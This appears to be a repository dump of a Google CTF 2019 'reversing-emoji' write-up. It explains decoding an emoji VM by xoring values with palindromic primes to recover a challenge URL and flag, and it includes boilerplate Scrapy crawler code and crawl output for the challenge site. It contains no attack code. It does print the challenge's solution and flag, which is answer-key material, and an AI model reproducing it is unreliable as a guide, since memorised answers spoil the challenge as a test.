41 | The numbers on the left of the xor match the values pushed onto the stack. All 3 blocks are similar so we can assume that they all doing the same thing different numbers. And we can also guess that the numbers on the right have to be calculated and the time it takes to calculate those increase as the program goes on. We can also see that the numbers on the right are primes and that supports our theory that maybe we need to make the calculations more effecient. They seem to specific primes however, not just any prime number. There is an [online database for number sequences](oeis.org/) so we can just enter those numbers in there and we can see that they are [palindromic prime numbers](https://oeis.org/A002385). It even gives us a small list and algorithms to find them. Another observation is that the palindromes are in order, so now we can just calculate them and xor each one with the values. `extract-palindromes.py` outputs a list of palindromes in the `palindromes` file. Filtering the first 6 million primes is enough to get all the palindromes needed. `palindromes.py` reads the list of palindromes and xors them with the correct values.
42 |
43 | The first chunk prints out `http://emoji-t0anaxnr3nacpt4na.web.ctfco` and we can see already, that the url is longer than the one we had earlier. We already know the rest of the url which is `mpetition.com/` and that matches the number of values in the next chunk. Use this, we can reverse it and double check that we are doing it correctly. If we try doing the same thing with the second chunk, it does not produce the same output. This is where the `🚛 🥈 9️⃣ 9️⃣ ✋` comes in. That value gives us the starting index - 1. Finally, the full url is `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/humans_and_cauliflowers_network/` and we can get the flag `CTF{Peace_from_Cauli!}`.
--------------------------------------------------------------------------------
/07-reversing-emoji/__pycache__/crawl.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/crawl.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/__pycache__/vm.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/vm.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/items.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your scraped items
4 | #
5 | # See documentation in:
6 | # https://doc.scrapy.org/en/latest/topics/items.html
7 |
8 | import scrapy
9 |
10 |
11 | class ImageItem(scrapy.Item):
12 | # define the fields for your item here like:
13 | # name = scrapy.Field()
14 | image_urls=Field()
15 | images=Field()
16 | pass
17 |
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/middlewares.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your spider middleware
4 | #
5 | # See documentation in:
6 | # https://doc.scrapy.org/en/latest/topics/spider-middleware.html
7 |
8 | from scrapy import signals
9 |
10 |
11 | class CtfCrawlSpiderMiddleware(object):
12 | # Not all methods need to be defined. If a method is not defined,
13 | # scrapy acts as if the spider middleware does not modify the
14 | # passed objects.
15 |
16 | @classmethod
17 | def from_crawler(cls, crawler):
18 | # This method is used by Scrapy to create your spiders.
19 | s = cls()
20 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
21 | return s
22 |
23 | def process_spider_input(self, response, spider):
24 | # Called for each response that goes through the spider
25 | # middleware and into the spider.
26 |
27 | # Should return None or raise an exception.
28 | return None
29 |
30 | def process_spider_output(self, response, result, spider):
31 | # Called with the results returned from the Spider, after
32 | # it has processed the response.
33 |
34 | # Must return an iterable of Request, dict or Item objects.
35 | for i in result:
36 | yield i
37 |
38 | def process_spider_exception(self, response, exception, spider):
39 | # Called when a spider or process_spider_input() method
40 | # (from other spider middleware) raises an exception.
41 |
42 | # Should return either None or an iterable of Response, dict
43 | # or Item objects.
44 | pass
45 |
46 | def process_start_requests(self, start_requests, spider):
47 | # Called with the start requests of the spider, and works
48 | # similarly to the process_spider_output() method, except
49 | # that it doesn’t have a response associated.
50 |
51 | # Must return only requests (not items).
52 | for r in start_requests:
53 | yield r
54 |
55 | def spider_opened(self, spider):
56 | spider.logger.info('Spider opened: %s' % spider.name)
57 |
58 |
59 | class CtfCrawlDownloaderMiddleware(object):
60 | # Not all methods need to be defined. If a method is not defined,
61 | # scrapy acts as if the downloader middleware does not modify the
62 | # passed objects.
63 |
64 | @classmethod
65 | def from_crawler(cls, crawler):
66 | # This method is used by Scrapy to create your spiders.
67 | s = cls()
68 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
69 | return s
70 |
71 | def process_request(self, request, spider):
72 | # Called for each request that goes through the downloader
73 | # middleware.
74 |
75 | # Must either:
76 | # - return None: continue processing this request
77 | # - or return a Response object
78 | # - or return a Request object
79 | # - or raise IgnoreRequest: process_exception() methods of
80 | # installed downloader middleware will be called
81 | return None
82 |
83 | def process_response(self, request, response, spider):
84 | # Called with the response returned from the downloader.
85 |
86 | # Must either;
87 | # - return a Response object
88 | # - return a Request object
89 | # - or raise IgnoreRequest
90 | return response
91 |
92 | def process_exception(self, request, exception, spider):
93 | # Called when a download handler or a process_request()
94 | # (from other downloader middleware) raises an exception.
95 |
96 | # Must either:
97 | # - return None: continue processing this exception
98 | # - return a Response object: stops process_exception() chain
99 | # - return a Request object: stops process_exception() chain
100 | pass
101 |
102 | def spider_opened(self, spider):
103 | spider.logger.info('Spider opened: %s' % spider.name)
104 |
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/pipelines.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define your item pipelines here
4 | #
5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting
6 | # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
7 |
8 | class CtfCrawlPipeline(object):
9 | def process_item(self, item, spider):
10 | return item
11 |
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/settings.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Scrapy settings for ctf_crawl project
4 | #
5 | # For simplicity, this file contains only settings considered important or
6 | # commonly used. You can find more settings consulting the documentation:
7 | #
8 | # https://doc.scrapy.org/en/latest/topics/settings.html
9 | # https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
10 | # https://doc.scrapy.org/en/latest/topics/spider-middleware.html
11 |
12 | BOT_NAME = 'ctf_crawl'
13 |
14 | SPIDER_MODULES = ['ctf_crawl.spiders']
15 | NEWSPIDER_MODULE = 'ctf_crawl.spiders'
16 |
17 |
18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent
19 | #USER_AGENT = 'ctf_crawl (+http://www.yourdomain.com)'
20 |
21 | # Obey robots.txt rules
22 | ROBOTSTXT_OBEY = True
23 |
24 | # Configure maximum concurrent requests performed by Scrapy (default: 16)
25 | #CONCURRENT_REQUESTS = 32
26 |
27 | # Configure a delay for requests for the same website (default: 0)
28 | # See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
29 | # See also autothrottle settings and docs
30 | #DOWNLOAD_DELAY = 3
31 | # The download delay setting will honor only one of:
32 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16
33 | #CONCURRENT_REQUESTS_PER_IP = 16
34 |
35 | # Disable cookies (enabled by default)
36 | #COOKIES_ENABLED = False
37 |
38 | # Disable Telnet Console (enabled by default)
39 | #TELNETCONSOLE_ENABLED = False
40 |
41 | # Override the default request headers:
42 | #DEFAULT_REQUEST_HEADERS = {
43 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
44 | # 'Accept-Language': 'en',
45 | #}
46 |
47 | # Enable or disable spider middlewares
48 | # See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
49 | #SPIDER_MIDDLEWARES = {
50 | # 'ctf_crawl.middlewares.CtfCrawlSpiderMiddleware': 543,
51 | #}
52 |
53 | # Enable or disable downloader middlewares
54 | # See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
55 | #DOWNLOADER_MIDDLEWARES = {
56 | # 'ctf_crawl.middlewares.CtfCrawlDownloaderMiddleware': 543,
57 | #}
58 |
59 | # Enable or disable extensions
60 | # See https://doc.scrapy.org/en/latest/topics/extensions.html
61 | #EXTENSIONS = {
62 | # 'scrapy.extensions.telnet.TelnetConsole': None,
63 | #}
64 |
65 | # Configure item pipelines
66 | # See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
67 | ITEM_PIPELINES = {'scrapy.pipelines.images.ImagesPipeline': 1}
68 | IMAGES_STORE = 'images'
69 |
70 | # Enable and configure the AutoThrottle extension (disabled by default)
71 | # See https://doc.scrapy.org/en/latest/topics/autothrottle.html
72 | #AUTOTHROTTLE_ENABLED = True
73 | # The initial download delay
74 | #AUTOTHROTTLE_START_DELAY = 5
75 | # The maximum download delay to be set in case of high latencies
76 | #AUTOTHROTTLE_MAX_DELAY = 60
77 | # The average number of requests Scrapy should be sending in parallel to
78 | # each remote server
79 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
80 | # Enable showing throttling stats for every response received:
81 | #AUTOTHROTTLE_DEBUG = False
82 |
83 | # Enable and configure HTTP caching (disabled by default)
84 | # See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
85 | #HTTPCACHE_ENABLED = True
86 | #HTTPCACHE_EXPIRATION_SECS = 0
87 | #HTTPCACHE_DIR = 'httpcache'
88 | #HTTPCACHE_IGNORE_HTTP_CODES = []
89 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
90 |
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__init__.py:
--------------------------------------------------------------------------------
1 | # This package will contain the spiders of your Scrapy project
2 | #
3 | # Please refer to the documentation for information on how to create and manage
4 | # your spiders.
5 |
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/cat_images.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import scrapy
3 | import scrapy.item
4 |
5 |
6 | class CatImagesSpider(scrapy.Spider):
7 | name = 'cat_images'
8 | allowed_domains = ['emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com']
9 | start_urls = ['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com']
10 |
11 | def parse(self, response):
12 | for img in response.xpath('//img[@src]/@src').getall():
13 | yield ImageItem(image_urls=['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/' + img])
14 | yield {'url': response.url}
15 |
16 | for next_page in response.xpath('//ul/li/a[@href]/@href').getall():
17 | yield response.follow(next_page, self.parse)
18 |
19 | class ImageItem(scrapy.Item):
20 | image_urls=scrapy.Field()
21 | images=scrapy.Field()
22 | pass
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/images.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/images.zip
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/output.json:
--------------------------------------------------------------------------------
1 | [
2 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com", "images": []},
3 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png", "path": "full/b66cef15fb1f24f0357c293fabd1ee4ae370fcea.jpg", "checksum": "da8327ecd3cf8045541b5297509d3b55"}]},
4 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/7e7399c7d06333ec886eee6b678d3595.html", "images": []},
5 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c4827b3b9c0c9e94183f30303f1cf8cf.html", "images": []},
6 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/94ad2d38e6c461572bad2199d0fd00ff.html", "images": []},
7 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/eaccf8725acda38ec2c1d9a591d54601.html", "images": []},
8 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/211fb2008f7e90b83c307931957642aa.html", "images": []},
9 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-47.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-47.png", "path": "full/92c5bebb4a1a5a2abe763662410522e020370036.jpg", "checksum": "915360b466171ae973a31f36a8dccf2b"}]},
10 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-16.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-16.png", "path": "full/9a98f8e6371a0c0bee4db8fbdc16e1de6e20b358.jpg", "checksum": "030ab1ea9f6a2575d3b761c9e6f94cf4"}]},
11 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cdea521070598db1a707d2e143e374e3.html", "images": []},
12 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/0aecf5c83a232343bb1b1b7ffb666438.html", "images": []},
13 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bc38f47945d2d515719a37dacd214240.html", "images": []},
14 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-28.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-28.png", "path": "full/3f98ab360a2a663c47ea4e6c264e286801f0e321.jpg", "checksum": "a45acf55d7eafba433e029a4f77156ff"}]},
15 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-52.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-52.png", "path": "full/c9d6bd3443944576a8f1c9db3e023a9c3fd0f093.jpg", "checksum": "daf4d5b53e8150cc34c4f929dafe6176"}]},
16 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-27.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-27.png", "path": "full/4654a4edf8b48b6f0b25344d4732cdb363f9fd86.jpg", "checksum": "7bedf20344ed7396ada03e05568d342a"}]},
17 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b9ef5a48186aacc5a1ca7e3f6edd48d2.html", "images": []},
18 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f6b0fe40439503e23e68e62a8af8e52.html", "images": []},
19 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/168d5019cd091949cbbdc06acb80d78a.html", "images": []},
20 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f30bc5c7375ba52fed40659140e6460e.html", "images": []},
21 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4d1f3b376efdb55bcf4d6ac77b088073.html", "images": []},
22 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b50d83f0910a5ecc2809ff6576d8e845.html", "images": []},
23 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5850a44366b4286c2d2f758a05c246f5.html", "images": []},
24 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1110015dc696d6c73e3f9aece0a8bcd9.html", "images": []},
25 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f9dbf163a76a90fd2a6b4de1010841e.html", "images": []},
26 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/41c19f57ef225ddb1c63a4d1b008214c.html", "images": []},
27 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f9e55e5fefd6ab08428c35b310bddbaf.html", "images": []},
28 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/fedcf4569e5de4486998651b0f804ae5.html", "images": []},
29 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4f3400fc1c3427d937821b012f7aecc.html", "images": []},
30 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9ca6dd45f49a59e5a8e2e87294acb42e.html", "images": []},
31 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-36.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-36.png", "path": "full/22d41b0a6ed5e6eb26978dc9947348984fa2751a.jpg", "checksum": "b747ee5de7b71378689ddf28b4e0324d"}]},
32 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-33.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-33.png", "path": "full/92570bbf9f191675caa67287efbbc6cc305359f4.jpg", "checksum": "fe800727805b94d62b6890c20d700eda"}]},
33 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-08.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-08.png", "path": "full/fffac339f992de646f4afda9e397f8a944cc892a.jpg", "checksum": "12cc841fd891e084d098d2c1dff20e40"}]},
34 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5bfb79469792c7dde95217f19536be92.html", "images": []},
35 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-14.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-14.png", "path": "full/039a702f65c376fae9a12c05bdd8a8b3b59c7dda.jpg", "checksum": "afbe89777fc107502443bcd18a24b125"}]},
36 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2817b54b53077139e388c240060035f.html", "images": []},
37 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-29.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-29.png", "path": "full/83f48d80345289ed99ab4223a06c1e82f1040753.jpg", "checksum": "be4d0c75228e1320eedceb53952da777"}]},
38 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f0ce6a8adea95e300fab564bf80689d9.html", "images": []},
39 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-21.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-21.png", "path": "full/97e1e344d7c6fef1407268f46e111739a4f6b209.jpg", "checksum": "5b27adc11e6e7e4aadd002ea43bf9ed8"}]},
40 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-56.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-56.png", "path": "full/38a562208b2c75253faf0ce904e3315941229e27.jpg", "checksum": "a959798a56e336faf024f7f5cf3e7278"}]},
41 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-25.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-25.png", "path": "full/9629f6e5f45c96f6baeffd4537492dc292967e51.jpg", "checksum": "9329bfc1986df8b54d0a764c9ac9aee3"}]},
42 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2d71f56f6b55ef8ded7544d45717c92.html", "images": []},
43 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-48.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-48.png", "path": "full/85314f7ad344aa310a68e2a4dba35b5351241394.jpg", "checksum": "0ac23f09bd44defda99c2866811b9f98"}]},
44 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/e0b54759634476f01beffd1f0171ede1.html", "images": []},
45 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-12.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-12.png", "path": "full/9eda20a2e263c2f8b86403961f8dd4d7bb690f63.jpg", "checksum": "9da6095016ea0f36f45dbe7eaad983ab"}]},
46 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bae8f02cb87dcb8f13fa8ba41a45ba70.html", "images": []},
47 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d5759ae9d021e5749b4fb627c539c51c.html", "images": []},
48 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/750842afeb0e9be2b12e022b166c0a1c.html", "images": []},
49 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-45.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-45.png", "path": "full/7c2112573a36c6ecd0fcaee7910262d9261ad3a7.jpg", "checksum": "3a3620d255565ad02a85d7f977333313"}]},
50 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4b30b716bfa0481c0d77a40e49c18d5.html", "images": []},
51 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-07.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-07.png", "path": "full/c4218cd04fd778cb294126da9e8080d2698b48c2.jpg", "checksum": "7d69d714d7e8bb496fb5fd8c715b16f7"}]},
52 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/3942ec1a459fcf0a2270e9e2b1b735d9.html", "images": []},
53 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-53.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-53.png", "path": "full/65956be3df8d2cf2dd92b68bc27ca00d971c90cf.jpg", "checksum": "8fefb94e886b31a4d18713734a380926"}]},
54 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-15.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-15.png", "path": "full/a16ef5e5ac564d8575751c92d1a79bec626b1291.jpg", "checksum": "f380f9a007b1c95dd5c4d396d14811ad"}]},
55 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-30.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-30.png", "path": "full/3399391f56c8cf33639811e23ec1b0680331f828.jpg", "checksum": "129c07390481e91e982f40ce09014878"}]},
56 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-26.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-26.png", "path": "full/718d65f9d78edbb731d393133d9ad1e7c17f3918.jpg", "checksum": "07ea3c9a50faeb2226e34ac9359a703c"}]},
57 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-46.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-46.png", "path": "full/0e1eb22bdc579904b1fcb1e47779dbe0101c47f6.jpg", "checksum": "e0c267f5042a480d4e8b5a66d567bcfd"}]},
58 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/baa23943b1a503845bdef9cdf4700a08.html", "images": []},
59 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b96110364868f63f1f6d0967addad330.html", "images": []},
60 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-37.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-37.png", "path": "full/ea44bc35b1c061514df02383d43144e0ad8cfd99.jpg", "checksum": "b716a56675f009d8d96775357f11eb15"}]},
61 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-10.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-10.png", "path": "full/ec4c33f2a3b93616e7ced72ce9dcc43a9db8da10.jpg", "checksum": "625f4ded6d3f3babd4603a534bce77ca"}]},
62 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-31.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-31.png", "path": "full/467eb907739397a78c295c7ec9c73fdbbd1a5b11.jpg", "checksum": "a8bfb781aaf0efe9819895e036a4e548"}]},
63 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f10e496cacb28e2a77eb8f750741440e.html", "images": []},
64 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/455a9d95d3f48a2703d02e734d18ab14.html", "images": []},
65 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4b556ca0f01983aca5856901d1e5a2d1.html", "images": []},
66 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/42c8cc7f22acfa5d7ef297bdae2ba743.html", "images": []},
67 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d048074b981e463b4df2bf24b09d51c9.html", "images": []},
68 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d929d4e9b615822d28e3c74cc3df0a36.html", "images": []},
69 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/22157e71e3d340dbc1191565ccf97544.html", "images": []},
70 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d8dc0f5386fc47d7f65df3134de92fff.html", "images": []},
71 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-05.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-05.png", "path": "full/006ee3c4a70c4b66658e16cf9970fb2accd2d943.jpg", "checksum": "8b168e56c5e0daae14c6df45d6af8c7a"}]},
72 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-34.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-34.png", "path": "full/2e7bd553d7169e3c5e99bb1b14023da779c37afd.jpg", "checksum": "6dfd617e35381d67f1b515a167a6276b"}]},
73 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/ebf110c11d160eaaa91d441305ff8874.html", "images": []},
74 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/8b163f2f9559f60517c09fa6a177da79.html", "images": []},
75 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/253e66a37fe263f34cfe46d817b3cd16.html", "images": []},
76 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-50.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-50.png", "path": "full/94fc1e0084ce3836bcb9aaa625ee02142ed17a74.jpg", "checksum": "e89cc47dee6c5fc3de3358f351a10fe2"}]},
77 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/656eb695e3bb2feab65808d5bec205f2.html", "images": []},
78 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/27c57d4efda38a82a001127bf3409e45.html", "images": []},
